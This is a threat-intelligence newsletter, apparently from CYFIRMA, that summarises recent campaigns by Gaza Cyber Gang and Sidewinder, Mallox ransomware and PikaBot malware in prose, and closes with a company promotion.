CYFIRMA: Cybersecurity Dossier
Threat Actor in Focus: Gaza Cyber Gang Employed Modified Version of Pierogi Malware to Target Palestine and Israel
Recently the Gaza Cyber Gang, a pro-Hamas threat actor, has been observed targeting Palestinian entities using an updated backdoor called Pierogi++. This updated malware, named by researchers, differs from its predecessors by being implemented in C++ rather than Delphi or Pascal. Security researchers observed a consistent targeting pattern of Palestinian entities in the group’s recent activities, unchanged since the onset of the Israel-Hamas conflict. The group is active since at least 2012. The Gaza Cyber Gang has a history of targeting the Middle East, specifically Israel, and Palestine, employing spear-phishing as a primary method for initial access. Their arsenal includes various malware families like BarbWire, DropBook, LastConn, Micropsia, and more.
Conventional Threat Intelligence: A Relic in the Evolving Cyber Landscape?
In today’s cybersecurity world, Conventional Threat Intelligence (CTI) is facing an existential crisis. Once a cornerstone of organizational defence, Conventional Threat Intelligence effectiveness is waning due to several factors that render it ill-suited for the modern threat landscape. Firstly, the rapid evolution of cyber threats outpaces the capabilities of Conventional Threat Intelligence, which relies heavily on known signatures and historical data. Polymorphic malware, zero-day exploits, and fileless attacks, all hallmarks of modern threats, deftly evade detection by these traditional methods. Secondly, advanced threats, such as Advanced Persistent Threats (APTs), are designed to bypass signature-based detection, rendering Conventional Threat Intelligence ineffective against these sophisticated adversaries.
From Macro to Payload: Decrypting the Sidewinder Cyber Intrusion Tactics
This report delves into a recent campaign involving a malicious Word document equipped with an embedded macro, unravelling a sophisticated cyber threat orchestrated by the Sidewinder group possibly to target Nepalese government officials. The threat begins with a potentially spear-phished email delivering a malicious Word document. After download and upon opening the document, the embedded macro executes, manipulating victims into enabling macros. This triggers a complex sequence of events, involving the creation and execution of various scripts and the establishment of persistence mechanisms. The analysis uncovers a multi-stage attack designed to hide activities, establish persistence, and execute malicious payloads.
CYFIRMA Industry Report : INFORMATION TECHNOLOGY
Welcome to the CYFIRMA infographic industry report, where we delve into the external threat landscape of the information technology industry over the past three months. This report provides valuable insights and data-driven statistics, delivering a concise analysis of attack campaigns, phishing telemetry, and ransomware incidents targeting the information technology industry.
We aim to present an industry-specific overview in a convenient, engaging, and informative format. Leveraging our cutting-edge platform telemetry and the expertise of our analysts, we bring you actionable intelligence to stay ahead in the cybersecurity landscape. For the purpose of these reports, we leverage the following data from our platform.?
领英推荐
Ransomware of the Week
CYFIRMA Research and Advisory Team has found a Mallox ransomware while monitoring various underground forums as part of our Threat Discovery Process. Mallox is a ransomware threat that has been operational since its appearance in 2021. Mallox ransomware typically gains initial access by exploiting vulnerabilities in publicly exposed services, with a specific emphasis on MS-SQL (Microsoft SQL Server) and ODBC (Open Database Connectivity) interfaces. It specifically targets vulnerabilities such as unpatched instances of older remote code execution (RCE) vulnerabilities like CVE-2019-1068 in Microsoft SQL Server and CVE-2020-0618 in Microsoft SQL Server Reporting Services.
Trending Malware of the Week
This week “PikaBot” is trending. Over the recent days, researchers have detected PikaBot, a fresh malware family that surfaced in early 2023. Its distribution method has shifted to malvertising, marking a departure from its previous mode of dissemination through malspam campaigns. In earlier attacks, the typical PikaBot distribution chain involves an email with a link to an external website, leading users to download malicious JavaScript from a zip archive. The JavaScript establishes a random directory structure, retrieves the payload via the curl utility, and executes it (DLL) through rundll32. PikaBot's core module is injected into the legitimate SearchProtocolHost.exe process, and its loader employs indirect syscalls to conceal the injection, enhancing the malware's stealthiness.
CYFIRMA is a?threat?discovery?and cyber-intelligence company with the world’s first platform that can deliver predictive cyber-intelligence. We combine cyber-intelligence with attack surface discovery and digital risk protection to deliver early warning, personalized, contextual, outside-in, and multi-layered insights. We have built the next generation of AI-powered threat intelligence platform called External Threat Landscape Management (ETLM) to provide cyber defenders with the hacker’s view to help clients prepare for impending attacks.
SCHEDULE A DEMO HERE
Visit www.cyfirma.com